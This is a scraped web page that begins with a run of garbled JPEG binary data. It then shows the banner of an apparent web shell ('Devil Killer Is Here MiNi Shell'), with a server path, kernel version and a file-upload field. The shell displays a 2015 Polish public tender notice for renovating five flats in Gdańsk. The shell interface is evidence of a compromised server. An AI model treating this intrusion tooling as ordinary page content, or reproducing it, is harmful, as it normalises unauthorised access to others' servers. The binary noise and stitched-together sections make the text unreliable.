JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150206/27274-N-2015.html

<p class="kh_header"><b>Gdańsk: Wykonanie remontów kapitalnych 5 lokali mieszkalnych położonych przy ul. Św. Ducha oraz Złotników w Gdańsku</b><br>
<b>Numer ogłoszenia: 27274 - 2015; data zamieszczenia: 06.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gdańska Infrastruktura Społeczna Sp. z o. o. , ul. Sobótki 9, 80-247 Gdańsk, woj. pomorskie, tel. 058 5208070, faks 058 3454298.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gisgdansk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka komunalna prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie remontów kapitalnych 5 lokali mieszkalnych położonych przy ul. Św. Ducha oraz Złotników w Gdańsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie remontu kapitalnego mieszkań położonych przy ul. Św. Ducha 31A/35 lokal nr 10, Św. Ducha 31A/35 lokal nr 13, Św. Ducha 44/46 lokal nr 1, Złotników 28/29 lokal nr 17, Św. Ducha 79/81 lokal nr 5, w następującym zakresie:<br>
1. Roboty ogólnobudowlane obejmujące:<br>
a) roboty rozbiórkowe,<br>
b) wykonanie lub uzupełnienie ścianek działowych,<br>
c) wykonanie zabudów z płyt gipsowo - kartonowych w łazience,<br>
d) wykonanie podbudowy posadzki,<br>
e) wykonanie fragmentów sufitu podwieszanego z płyt gipsowo - kartonowych na stelażu wraz z izolacją sufitu wełną mineralną,<br>
f) roboty murarskie,<br>
g) roboty tynkarskie,<br>
h) wykonanie gładzi gipsowych,<br>
i) roboty malarskie,<br>
j) położenie paneli podłogowych,<br>
k) montaż listew przypodłogowych,<br>
l) ułożenie okładzin ceramicznych na podłodze w pomieszczeniach kuchni i łazienki,<br>
m) położenie tapety dekoracyjnej na odpowiednich ścianach kuchni, korytarza i pokoju,<br>
n) położenie glazury na ścianach łazienki,<br>
o) montaż lustra na ścianach w pomieszczeniu łazienki,<br>
p) wymiana stolarki drzwiowej w mieszkaniu,<br>
q) wymiana stolarki okiennej wraz z wymianą podokienników wewnątrz i zewnątrz mieszkaniowych,<br>
r) montaż karniszy i galanterii łazienkowej.<br>
2. Roboty sanitarne obejmujące:<br>
a) demontaż starej instalacji wodociągowej, kanalizacyjnej, centralnego ogrzewania i gazowej,<br>
b) montaż nowej instalacji wodociągowej ciepłej i zimnej wody oraz kanalizacyjnej,<br>
c) demontaż starego oraz montaż nowego wodomierza,<br>
d) podłączenie instalacji do podgrzewacza elektrycznego ciepłej wody użytkowej,<br>
e) montaż urządzeń sanitarnych oraz osprzętu w łazience i kuchni,<br>
f) demontaż starych i montaż nowych grzejników wraz zaworami i orurowaniem.<br>
3. Roboty elektryczne obejmujące:<br>
a) demontaż starej instalacji elektrycznej,<br>
b) montaż nowej instalacji elektrycznej z osprzętem, oprawami oświetleniowymi i domofonem,<br>
c) montaż podgrzewacza elektrycznego ciepłej wody użytkowej,<br>
d) montaż wentylatora łazienkowego.<br>
4. Opracowania dokumentacji powykonawczej dla każdego lokalu mieszkalnego.<br>
5. Szczegółowy opis przedmiotu zamówienia stanowią:<br>
1 Projekt aranżacji lokalu mieszkalnego, Gdańsk ul. Św. Ducha 31A/35 m 10, obręb 89, dz. nr 39/3 - załącznik nr 2 do SIWZ.<br>
a) inwentaryzacja stanu istniejącego - rys. nr A.1.1 - załącznik nr 2a do SIWZ,<br>
b) inwentaryzacja po zmianach - rys. nr A.1.2 - załącznik nr 2b do SIWZ,<br>
c) układ funkcjonalny - rys. nr A.1.3 - załącznik nr 2c do SIWZ,<br>
d) układ funkcjonalny - rys.nr  A.1.3a - załącznik nr 2d do SIWZ,<br>
e) układ posadzek - rys. nr A.1.3b - załącznik nr 2e do SIWZ,<br>
f) rozmieszczenia tapet - rys. nr A.1.3c - załącznik nr 2f do SIWZ,<br>
g) instalacje elektryczne - rys. nr A.1.4 - załącznik nr 2g do SIWZ,<br>
h) instalacja wod.- kan. i c.o.-  - rys. nr A.1.5 - załącznik nr 2h do SIWZ,<br>
i) projekt łazienki układ funkcjonalny - rys. nr A.1.6. - załącznik nr 2i do SIWZ,<br>
j) projekt łazienki kład ściany A-B - rys. nr A.1.6a. - załącznik nr 2j do SIWZ,<br>
k) projekt łazienki kład ściany B-C - rys. nr A.1.6b. - załącznik nr 2k do SIWZ,<br>
l) projekt łazienki kład ściany C-D - rys. nr A.1.6c. - załącznik nr 2l do SIWZ,<br>
m) projekt łazienki kład ściany D-A - rys. nr A.1.6d. - załącznik nr 2ł do SIWZ,<br>
n) projekt kuchni kład ściany, przekrój, rzut - rys. nr A.1.7 - załącznik nr 2m do SIWZ,<br>
o) okna podlegające wymianie /2 szt./ - rys. nr A.1.8. - załącznik nr 2n do SIWZ,<br>
p) zestawienie stolarki drzwiowej - załącznik nr 2o do SIWZ,<br>
q) zestawienie wyposażenia dla lokalu - załącznik nr 2p do SIWZ.<br>
2 Projekt aranżacji lokalu mieszkalnego, Gdańsk ul. Św. Ducha 31A/35 m 13, obręb 89, dz. nr 39/3 - załącznik nr 3 do SIWZ.<br>
a) inwentaryzacja stanu istniejącego - rys.nr  A.2.1 - załącznik nr 3a do SIWZ,<br>
b) inwentaryzacja po zmianach - rys. nr A.2.2 - załącznik nr 3b do SIWZ,<br>
c) układ funkcjonalny - rys. nr A.2.3 - załącznik nr 3c do SIWZ,<br>
d) układ funkcjonalny - rys. nr A.2.3a - załącznik nr 3d do SIWZ,<br>
e) układ posadzek - rys. nr A.2.3b - załącznik nr 3e do SIWZ,<br>
f) rozmieszczenia tapet - rys. nr A.2.3c - załącznik nr 3f do SIWZ,<br>
g) instalacje elektryczne - rys. nr A.2.4 - załącznik nr 3g do SIWZ,<br>
h) instalacja wod.- kan. i c.o.-  - rys. nr A.2.5 - załącznik nr 3h do SIWZ,<br>
i) projekt łazienki układ funkcjonalny - rys. nr A.2.6. - załącznik nr 3i do SIWZ,<br>
j) projekt łazienki kład ściany A-B - rys. nr A.2.6a. - załącznik nr 3j do SIWZ,<br>
k) projekt łazienki kład ściany B-C - rys. nr A.2.6b. - załącznik nr 3k do SIWZ,<br>
l) projekt łazienki kład ściany C-D - rys. nr A.2.6c. - załącznik nr 3l do SIWZ,<br>
m) projekt łazienki kład ściany D-A - rys. nr A.2.6d. - załącznik nr 3ł do SIWZ,<br>
n) Projekt kuchni kład ściany, przekrój, rzut - rys.nr  A.2.7 - załącznik nr 3m do SIWZ,<br>
o) Okno podlegające wymianie - rys. nr A.2.8. - załącznik nr 3n do SIWZ,<br>
p) zestawienie stolarki drzwiowej - załącznik nr 3o do SIWZ,<br>
q) zestawienie wyposażenia dla lokalu - załącznik nr 3p do SIWZ.<br>
3 Projekt aranżacji lokalu mieszkalnego, Gdańsk ul. Św. Ducha 44/46 m 1, obręb 89, dz. nr 353/9 - załącznik nr 4 do SIWZ.<br>
a) inwentaryzacja stanu istniejącego - rys. nr A.3.1 - załącznik nr 4a do SIWZ,<br>
b) inwentaryzacja po zmianach - rys. nr A.3.2 - załącznik nr 4b do SIWZ,<br>
c) układ funkcjonalny - rys. nr A.3.3 - załącznik nr 4c do SIWZ,<br>
d) układ funkcjonalny - rys. nr A.3.3a - załącznik nr 4d do SIWZ,<br>
e) układ posadzek - rys. nr A.3.3b - załącznik nr 4e do SIWZ,<br>
f) rozmieszczenia tapet - rys. nr A.3.3c - załącznik nr 4f do SIWZ,<br>
g) instalacje elektryczne - rys. nr A.3.4 - załącznik nr 4g do SIWZ,<br>
h) instalacja wod.- kan. i c.o.-  - rys. nr A.3.5 - załącznik nr 4h do SIWZ,<br>
i) projekt łazienki układ funkcjonalny - rys. nr A.3.6. - załącznik nr 4i do SIWZ,<br>
j) projekt łazienki kład ściany A-B - rys. nr A.3.6a. - załącznik nr 4j do SIWZ,<br>
k) projekt łazienki kład ściany B-C - rys. nr A.3.6b. - załącznik nr 4k do SIWZ,<br>
l) projekt łazienki kład ściany C-D - rys.nr  A.3.6c. - załącznik nr 4l do SIWZ,<br>
m) projekt łazienki kład ściany D-A - rys. nr A.3.6d. - załącznik nr 4ł do SIWZ,<br>
n) Projekt kuchni kład ściany, przekrój, rzut - rys. nr A.3.7 - załącznik nr 4m do SIWZ,<br>
o) okna podlegające wymianie /2 szt./ - rys. nr A.3.8. - załącznik nr 4n do SIWZ,<br>
p) zestawienie stolarki drzwiowej - załącznik nr 4o do SIWZ,<br>
q) zestawienie wyposażenia dla lokalu - załącznik nr 4p do SIWZ.<br>
4 Projekt aranżacji lokalu mieszkalnego, Gdańsk ul. Złotników 28/29 m 17, obręb 89, dz. nr 189 - załącznik nr 5 do SIWZ.<br>
a) inwentaryzacja stanu istniejącego - rys. nr A.4.1 - załącznik nr 5a do SIWZ,<br>
b) inwentaryzacja po zmianach - rys. nr A.4.2 - załącznik nr 5b do SIWZ,<br>
c) układ funkcjonalny - rys. nr A.4.3 - załącznik nr 5c do SIWZ,<br>
d) układ funkcjonalny - rys. nr A.4.3a - załącznik nr 5d do SIWZ,<br>
e) układ posadzek - rys. nr A.4.3b - załącznik nr 5e do SIWZ,<br>
f) rozmieszczenia tapet - rys. nr A.4.3c - załącznik nr 5f do SIWZ,<br>
g) instalacje elektryczne - rys. nr A.4.4 - załącznik nr 5g do SIWZ,<br>
h) instalacja wod.- kan. i c.o. - rys. nr A.4.5 - załącznik nr 5h do SIWZ,<br>
i) projekt łazienki układ funkcjonalny - rys. nr A.4.6. - załącznik nr 5i do SIWZ,<br>
j) projekt łazienki kład ściany A-B - rys. nr A.4.6a. - załącznik nr 5j do SIWZ,<br>
k) projekt łazienki kład ściany B-C - rys. nr A.4.6b. - załącznik nr 5k do SIWZ,<br>
l) projekt łazienki kład ściany C-D - rys. nr A.4.6c. - załącznik nr 5l do SIWZ,<br>
m) projekt łazienki kład ściany D-A - rys. nr A.4.6d. - załącznik nr 5ł do SIWZ,<br>
n) Projekt kuchni kład ściany, przekrój, rzut - rys. nr A.4.7 - załącznik nr 5m do SIWZ,<br>
o) okna podlegające wymianie /2 szt./ - rys. nr A.4.8. - załącznik nr 5n do SIWZ,<br>
p) zestawienie stolarki drzwiowej - załącznik nr 5o do SIWZ,<br>
q) zestawienie wyposażenia dla lokalu - załącznik nr 5p do SIWZ.<br>
5 Projekt aranżacji lokalu mieszkalnego, Gdańsk ul. Św. Ducha 79/81 m 5, obręb 89, dz. nr 202/3 - załącznik nr 6 do SIWZ.<br>
a) inwentaryzacja stanu istniejącego - rys. nr A.5.1 - załącznik nr 6a do SIWZ,<br>
b) istniejąca instalacja wod.- kan. i c.o.-  załącznik 1 do projektu - załącznik 6b do SIWZ,<br>
c) inwentaryzacja po zmianach - rys. nr A.5.2 - załącznik nr 6c do SIWZ,<br>
d) układ funkcjonalny - rys. nr A.5.3 - załącznik nr 6d do SIWZ,<br>
e) układ funkcjonalny - rys. nr A.5.3a - załącznik nr 6e do SIWZ,<br>
f) układ posadzek - rys. nr A.5.3b - załącznik nr 6f do SIWZ,<br>
g) rozmieszczenia tapet - rys. nr A.5.3c - załącznik nr 6g do SIWZ,<br>
h) instalacje elektryczne - rys. nr A.5.4 - załącznik nr 6h do SIWZ,<br>
i) instalacja wod.- kan. i c.o. - rys. nr A.5.5 - załącznik nr 6i do SIWZ,<br>
j) projekt łazienki układ funkcjonalny - rys. nr A.5.6. - załącznik nr 6j do SIWZ,<br>
k) projekt łazienki kład ściany A-B - rys. nr A.5.6a. - załącznik nr 6k do SIWZ,<br>
l) projekt łazienki kład ściany B-C - rys. nr A.5.6b. - załącznik nr 6l do SIWZ,<br>
m) projekt łazienki kład ściany C-D - rys. nr A.5.6c. - załącznik nr 6ł do SIWZ,<br>
n) projekt łazienki kład ściany D-A - rys.nr  A.5.6d. - załącznik nr 6m do SIWZ,<br>
o) Projekt kuchni kład ściany, przekrój, rzut - rys. nr A.5.7 - załącznik nr 6n do SIWZ,<br>
p) okno podlegające wymianie /od strony Św. Ducha/ - rys. nr A.5.8. - załącznik nr 6o do SIWZ,<br>
q) okno podlegające wymianie /od strony podwórka/ - rys. nr A.5.9. - załącznik nr 6p do SIWZ,<br>
r) zestawienie stolarki drzwiowej - załącznik nr 6q do SIWZ,<br>
s) zestawienie wyposażenia dla lokalu - załącznik nr 6r do SIWZ.<br>
6 Specyfikacja techniczna wykonania i odbioru robót. Remont mieszkań przy ul. Św. Ducha 31A/35 m 10, Św. Ducha 31A/35 m 13, Św. Ducha 44/46 m 1, Św. Ducha 79/81 m 5, Złotników 28/29 m 17 w Gdańsku - załącznik nr 7 do SIWZ.<br>
7 Przedmiar robót - Kosztorys skrócony - ul. Św. Ducha 31A/35 lokal nr 10 - załącznik nr 8.1 do SIWZ.<br>
8 Przedmiar robót - Kosztorys skrócony - ul. Św. Ducha 31A/35 lokal nr 13 stanowiący załącznik nr 8.2 do SIWZ.<br>
9 Przedmiar robót - Kosztorys skrócony - ul. Św. Ducha 44/46 lokal nr 1 stanowiący załącznik nr 8.3 do SIWZ.<br>
10 Przedmiar robót - Kosztorys skrócony - ul. Złotników 28/29 lokal nr 17 stanowiący załącznik nr 8.4 do SIWZ.<br>
11 Przedmiar robót - Kosztorys skrócony - ul. Św. Ducha 79/81 lokal nr 5 stanowiący załącznik nr 8.5 do SIWZ.<br>
12 Pozostałe warunki wykonania zamówienia określone są we wzorze umowy stanowiącym załącznik do SIWZ.<br>
Przedmiary robót mają charakter wyłącznie informacyjny i nie są podstawą wyceny wynagrodzenia ryczałtowego, które należy określić na podstawie projektów aranżacji lokali mieszkalnych.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.00.00-1, 45.22.32.10-1, 45.31.00.00-3, 45.31.43.10-7, 45.33.00.00-9, 45.33.11.00-7, 45.40.00.00-1, 45.41.00.00-4, 45.42.10.00-4, 45.42.11.46-9, 45.42.11.52-4, 45.43.11.00-8, 45.43.12.00-9, 45.43.21.14-6, 45.43.22.20-2, 45.44.21.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 80.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> OFERTA MUSI BYĆ ZABEZPIECZONA WADIUM W WYSOKOŚCI: 5.000,00 PLN (SŁOWNIE: PIĘĆ TYSIĘCY 00/100 PLN) W TYM:<br>
Część I - 3.000,00 PLN (słownie: TRZY TYSIĄCE 00/100 PLN),<br>
Część II-  2.000,00 PLN (słownie: DWA TYSIĄCE 00/100 PLN)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku posiadania wiedzy i doświadczenia Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie wykonał co najmniej 2 roboty budowlane polegające na remoncie lokali mieszkalnych lub użytkowych obejmujących roboty ogólnobudowlane, sanitarne i elektryczne o wartości minimum 40.000,00 zł brutto każda - dotyczy części I lub II lub części I i II.<br>
Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia w/w warunki mogą spełniać łącznie.<br>
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków udowadniając, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca, w przypadku składania ofert na część I lub II lub część I i II, musi wykazać dysponowanie minimum 8 osobami, w tym:<br>
1. 1 osobą, na stanowisku kierownika budowy posiadającej uprawnienia budowlane wykonawcze w specjalności konstrukcyjno-budowlanej umożliwiające kierowanie robotami budowlanymi,<br>
2. 1 osobą posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie, upoważniające do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,<br>
3. 1 osobą posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie, upoważniające do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,<br>
4. 5 osobami do wykonywania robót.<br>
Wykonawca musi wykazać dysponowanie 8 osobami, w tym posiadającymi w/w uprawnienia.<br>
Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia w/w warunek mogą spełniać łącznie.<br>
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, udowadniając, iż będzie dysponował tymi osobami zdolnymi do wykonania zamówienia w trakcie realizacji zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku dotyczącego sytuacji ekonomicznej Wykonawca musi wykazać dysponowanie ubezpieczeniem od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości co najmniej:<br>
w przypadku składania oferty:<br>
a) na część I - 150.000,00 zł,<br>
b) na część II - 100.000,00 zł,<br>
c) na część I i II - 250.000,00 zł.<br>
W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, w/w warunek musi spełniać co najmniej jeden wykonawca.<br>
Wykonawca może polegać na zdolnościach ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, udowadniając, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Przez najważniejsze roboty budowlane, których dotyczy obowiązek wskazania przez wykonawcę w wykazie oraz złożenia poświadczeń, należy rozumieć roboty budowlane polegające na remoncie lokali mieszkalnych lub użytkowych obejmujących roboty ogólnobudowlane, sanitarne i elektryczne o wartości minimum 40.000,00 zł brutto.<br>
Zamawiający nie żąda informacji o robotach budowlanych niewykonanych lub wykonanych nienależycie.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>Pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.<br>
Wyżej wymienione zobowiązanie musi być złożony w formie oryginału.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

